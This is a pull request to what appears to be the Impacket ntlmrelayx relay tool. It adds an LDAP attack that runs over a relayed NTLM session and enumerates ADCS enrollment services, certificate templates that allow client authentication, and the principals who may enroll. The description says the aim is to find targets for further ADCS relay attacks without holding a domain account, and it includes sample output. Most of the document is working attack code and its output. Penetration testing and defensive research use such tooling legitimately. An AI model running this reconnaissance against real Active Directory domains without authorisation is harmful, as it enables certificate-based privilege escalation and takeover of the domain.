### PR TITLE
LDAP attack: dump ADCS enrollment services and certificate templates info

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -311,7 +311,7 @@ if __name__ == '__main__':
     ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name')
     ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')
     ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user')
-    ldapoptions.add_argument('--dump-adcs', action='store_true', required=False, help='Attempt to dump ADCS enrollment services info')
+    ldapoptions.add_argument('--dump-adcs', action='store_true', required=False, help='Attempt to dump ADCS enrollment services and certificate templates info')
 
     #IMAP options
     imapoptions = parser.add_argument_group("IMAP client options")

--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -152,7 +152,7 @@ def start_servers(options, threads):
         c.setAttacks(PROTOCOL_ATTACKS)
         c.setLootdir(options.lootdir)
         c.setOutputFile(options.output_file)
-        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.sid)
+        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid)
         c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port)
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
@@ -311,6 +311,7 @@ if __name__ == '__main__':
     ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name')
     ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')
     ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user')
+    ldapoptions.add_argument('--dump-adcs', action='store_true', required=False, help='Attempt to dump ADCS enrollment services info')
 
     #IMAP options
     imapoptions = parser.add_argument_group("IMAP client options")

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -640,7 +640,7 @@ class LDAPAttack(ProtocolAttack):
             unknwown_sids = enrollment_principals.difference(known_sids)
             sid_map.update(translate_sids(unknwown_sids))
 
-            LOG.info("Prinicipals who can enroll on enrollment service `%s`: %s" % (entry["attributes"]["displayName"],
+            LOG.info("Principals who can enroll on enrollment service `%s`: %s" % (entry["attributes"]["displayName"],
                      ", ".join(("`" + sid_map[principal] + "`" for principal in enrollment_principals))))
 
         if not len(offered_templates):
@@ -662,7 +662,7 @@ class LDAPAttack(ProtocolAttack):
             unknwown_sids = enrollment_principals.difference(known_sids)
             sid_map.update(translate_sids(unknwown_sids))
 
-            LOG.info("Prinicipals who can enroll using template `%s`: %s" % (entry["attributes"]["name"],
+            LOG.info("Principals who can enroll using template `%s`: %s" % (entry["attributes"]["name"],
                      ", ".join(("`" + sid_map[principal] + "`" for principal in enrollment_principals))))
 
         LOG.info("Done dumping ADCS info")

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -25,6 +25,8 @@ import re
 import ldap3
 import ldapdomaindump
 from ldap3.core.results import RESULT_UNWILLING_TO_PERFORM
+from ldap3.protocol.microsoft import security_descriptor_control
+from ldap3.protocol.formatters.formatters import format_sid
 from ldap3.utils.conv import escape_filter_chars
 import os
 from Cryptodome.Hash import MD4
@@ -536,6 +538,135 @@ class LDAPAttack(ProtocolAttack):
         # If none of these match, the ACE does not apply to this object
         return False
 
+    def dumpADCS(self):
+
+        def is_template_for_authentification(entry):
+            authentication_ekus = [b"1.3.6.1.5.5.7.3.2", b"1.3.6.1.5.2.3.4", b"1.3.6.1.4.1.311.20.2.2", b"2.5.29.37.0"]
+
+            # Ignore templates requiring manager approval
+            if entry["attributes"]["msPKI-Enrollment-Flag"] & 0x02:
+                return False
+
+            # No EKU = works for client authentication
+            if not len(entry["raw_attributes"]["pKIExtendedKeyUsage"]):
+                return True
+
+            try:
+                next((eku for eku in entry["raw_attributes"]["pKIExtendedKeyUsage"] if eku in authentication_ekus))
+                return True
+            except StopIteration:
+                return False
+
+        def get_enrollment_principals(entry):
+            # Mostly taken from github.com/ly4k/Certipy/certipy/security.py
+            sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
+            sd.fromString(entry["raw_attributes"]["nTSecurityDescriptor"][0])
+
+            enrollment_uuids = [
+                "00000000-0000-0000-0000-000000000000", # All-Extended-Rights
+                "0e10c968-78fb-11d2-90d4-00c04f79dc55", # Certificate-Enrollment
+                "a05b8cc2-17bc-4802-a710-e7c15ab866a2", # Certificate-AutoEnrollment
+            ]
+
+            enrollment_principals = set()
+
+            for ace in (a for a in sd["Dacl"]["Data"] if a["AceType"] == ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE):
+                sid = format_sid(ace["Ace"]["Sid"].getData())
+                if ace["Ace"]["ObjectTypeLen"] == 0:
+                    uuid = bin_to_string(ace["Ace"]["InheritedObjectType"]).lower()
+                else:
+                    uuid = bin_to_string(ace["Ace"]["ObjectType"]).lower()
+
+                if not uuid in enrollment_uuids:
+                    continue
+
+                enrollment_principals.add(sid)
+
+            return enrollment_principals
+
+        def translate_sids(sids):
+            default_naming_context = self.client.server.info.other["defaultNamingContext"][0]
+            try:
+                domain_fqdn = self.client.server.info.other["ldapServiceName"][0].split("@")[1]
+            except (KeyError, IndexError):
+                domain_fqdn = ""
+
+            sid_map = dict()
+
+            for sid in sids:
+                try:
+                    if sid.startswith("S-1-5-21-"):
+                        self.client.search(default_naming_context, "(&(objectSid=%s)(|(objectClass=group)(objectClass=user)))" % sid,
+                                    attributes=["name", "objectSid"], search_scope=ldap3.SUBTREE)
+                    else:
+                        self.client.search("CN=WellKnown Security Principals," + configuration_naming_context,
+                                    "(&(objectSid=%s)(objectClass=foreignSecurityPrincipal))" % sid, attributes=["name", "objectSid"],
+                                    search_scope=ldap3.LEVEL)
+                except:
+                    sid_map[sid] = sid
+                    continue
+
+                if not len(self.client.response):
+                    sid_map[sid] = sid
+                else:
+                    sid_map[sid] = domain_fqdn + "\\" + self.client.response[0]["attributes"]["name"]
+
+            return sid_map
+
+
+        LOG.info("Attempting to dump ADCS enrollment services info")
+
+        configuration_naming_context = self.client.server.info.other['configurationNamingContext'][0]
+
+        enrollment_service_attributes = ["certificateTemplates", "displayName", "dNSHostName", "msPKI-Enrollment-Servers", "nTSecurityDescriptor"]
+        self.client.search("CN=Enrollment Services,CN=Public Key Services,CN=Services," + configuration_naming_context,
+                           "(objectClass=pKIEnrollmentService)", search_scope=ldap3.LEVEL, attributes=enrollment_service_attributes,
+                           controls=security_descriptor_control(sdflags=0x04))
+
+        if not len(self.client.response):
+            LOG.info("No ADCS enrollment service found")
+            return
+
+        offered_templates = set()
+        sid_map = dict()
+        for entry in self.client.response:
+            LOG.info("Found ADCS enrollment service `%s` on host `%s`, offering templates: %s" % (entry["attributes"]["displayName"],
+                     entry["attributes"]["dNSHostName"], ", ".join(("`" + tpl + "`" for tpl in entry["attributes"]["certificateTemplates"]))))
+
+            offered_templates.update(entry["attributes"]["certificateTemplates"])
+            enrollment_principals = get_enrollment_principals(entry)
+
+            known_sids = set(sid_map.keys())
+            unknwown_sids = enrollment_principals.difference(known_sids)
+            sid_map.update(translate_sids(unknwown_sids))
+
+            LOG.info("Prinicipals who can enroll on enrollment service `%s`: %s" % (entry["attributes"]["displayName"],
+                     ", ".join(("`" + sid_map[principal] + "`" for principal in enrollment_principals))))
+
+        if not len(offered_templates):
+            LOG.info("No templates offered by the enrollment services")
+            return
+
+        LOG.info("Attempting to dump ADCS certificate templates enrollment rights, for templates allowing for client authentication and not requiring manager approval")
+
+        certificate_template_attributes = ["msPKI-Enrollment-Flag", "name", "nTSecurityDescriptor", "pKIExtendedKeyUsage"]
+        self.client.search("CN=Certificate Templates,CN=Public Key Services,CN=Services," + configuration_naming_context,
+                           "(&(objectClass=pKICertificateTemplate)(|%s))" % "".join(("(name=" + tpl + ")" for tpl in offered_templates)),
+                           search_scope=ldap3.LEVEL, attributes=certificate_template_attributes,
+                           controls=security_descriptor_control(sdflags=0x04))
+
+        for entry in (e for e in self.client.response if is_template_for_authentification(e)):
+            enrollment_principals = get_enrollment_principals(entry)
+
+            known_sids = set(sid_map.keys())
+            unknwown_sids = enrollment_principals.difference(known_sids)
+            sid_map.update(translate_sids(unknwown_sids))
+
+            LOG.info("Prinicipals who can enroll using template `%s`: %s" % (entry["attributes"]["name"],
+                     ", ".join(("`" + sid_map[principal] + "`" for principal in enrollment_principals))))
+
+        LOG.info("Done dumping ADCS info")
+
 
     def run(self):
         #self.client.search('dc=vulnerable,dc=contoso,dc=com', '(objectclass=person)')
@@ -705,21 +836,7 @@ class LDAPAttack(ProtocolAttack):
                     fd.close()
 
         if self.config.dumpadcs:
-            LOG.info("Attempting to dump ADCS enrollment services info")
-            try:
-                configuration_naming_context = next((c for c in self.client.server.info.naming_contexts if "Configuration" in c))
-            except StopIteration:
-                LOG.error("Error obtaining configuration naming context, skipping ADCS dump")
-            else:
-                adcs_attributes = ["certificateTemplates", "displayName", "dNSHostName", "msPKI-Enrollment-Servers"]
-                self.client.search("CN=Enrollment Services,CN=Public Key Services,CN=Services," + configuration_naming_context,
-                                   "(objectClass=pKIEnrollmentService)", search_scope=ldap3.LEVEL, attributes=adcs_attributes)
-
-                for entry in self.client.response:
-                    LOG.info("Found ADCS enrollment service `%s` on host `%s`, offering templates: `%s`" % (entry["attributes"]["displayName"],
-                             entry["attributes"]["dNSHostName"], "`, `".join(entry["attributes"]["certificateTemplates"])))
-                if not len(self.client.response):
-                    LOG.info("No ADCS enrollment services found")
+            self.dumpADCS()
 
         # Perform the Delegate attack if it is enabled and we relayed a computer account
         if self.config.delegateaccess and self.username[-1] == '$':

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -160,7 +160,7 @@ class NTLMRelayxConfig:
     def setRandomTargets(self, randomtargets):
         self.randomtargets = randomtargets
 
-    def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, dumpgmsa, sid):
+    def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, dumpgmsa, dumpadcs, sid):
         self.dumpdomain = dumpdomain
         self.addda = addda
         self.aclattack = aclattack
@@ -170,6 +170,7 @@ class NTLMRelayxConfig:
         self.delegateaccess = delegateaccess
         self.dumplaps = dumplaps
         self.dumpgmsa = dumpgmsa
+        self.dumpadcs = dumpadcs
         self.sid = sid
 
     def setMSSQLOptions(self, queries):


### PR DESCRIPTION
Hi !

This PR adds a new LDAP attack dumping information about the domain's ADCS enrollment services (host, offered templates, principals allowed to enroll) and certificate templates (principals allowed to enroll).

The use case for this is being able to, **without having a domain account**, obtain available ADCS hosts and templates in order to perform further relay attacks targeting ADCS.

Example output:
```
[*] Authenticating against ldap://dc2.domain.local as DOMAIN\user1 SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[*] Attempting to dump ADCS enrollment services info
[*] Found ADCS enrollment service `DOMAIN-DC1-CA` on host `DC1.DOMAIN.LOCAL`, offering templates: `UserVulnSAN`, `DirectoryEmailReplication`, `DomainControllerAuthentication`, `KerberosAuthentication`, `EFSRecovery`, `EFS`, `DomainController`, `WebServer`, `Machine`, `User`, `SubCA`, `Administrator`
[*] Principals who can enroll on enrollment service `DOMAIN-DC1-CA`: `DOMAIN.LOCAL\Authenticated Users`
[*] Attempting to dump ADCS certificate templates enrollment rights, for templates allowing for client authentication and not requiring manager approval
[*] Principals who can enroll using template `User`: `DOMAIN.LOCAL\Domain Admins`, `DOMAIN.LOCAL\Enterprise Admins`, `DOMAIN.LOCAL\Domain Users`
[*] Principals who can enroll using template `SubCA`: `DOMAIN.LOCAL\Domain Admins`, `DOMAIN.LOCAL\Enterprise Admins`
[*] Principals who can enroll using template `Machine`: `DOMAIN.LOCAL\Domain Admins`, `DOMAIN.LOCAL\Enterprise Admins`, `DOMAIN.LOCAL\Domain Computers`
[*] Principals who can enroll using template `Administrator`: `DOMAIN.LOCAL\Domain Admins`, `DOMAIN.LOCAL\Enterprise Admins`
[*] Principals who can enroll using template `DomainController`: `DOMAIN.LOCAL\Domain Admins`, `DOMAIN.LOCAL\Domain Controllers`, `DOMAIN.LOCAL\Enterprise Domain Controllers`, `DOMAIN.LOCAL\Enterprise Read-Only Domain Controllers`, `DOMAIN.LOCAL\Enterprise Admins`
[*] Principals who can enroll using template `KerberosAuthentication`: `DOMAIN.LOCAL\Domain Admins`, `DOMAIN.LOCAL\Domain Controllers`, `DOMAIN.LOCAL\Enterprise Domain Controllers`, `DOMAIN.LOCAL\Enterprise Read-Only Domain Controllers`, `DOMAIN.LOCAL\Enterprise Admins`
[*] Principals who can enroll using template `DomainControllerAuthentication`: `DOMAIN.LOCAL\Domain Admins`, `DOMAIN.LOCAL\Domain Controllers`, `DOMAIN.LOCAL\Enterprise Domain Controllers`, `DOMAIN.LOCAL\Enterprise Read-Only Domain Controllers`, `DOMAIN.LOCAL\Enterprise Admins`
[*] Done dumping ADCS info
```

In this example, we now know we can perform ADCS relay attacks by targeting `dc1.domain.local` and using template `User` for users and `Machine` for computers :slightly_smiling_face: (plug: since this is the default config, the correct template can be selected automatically using PR #1188 :wink: ).

Thanks to @ly4k for Certipy, from which some of this code is taken from.

Cheers !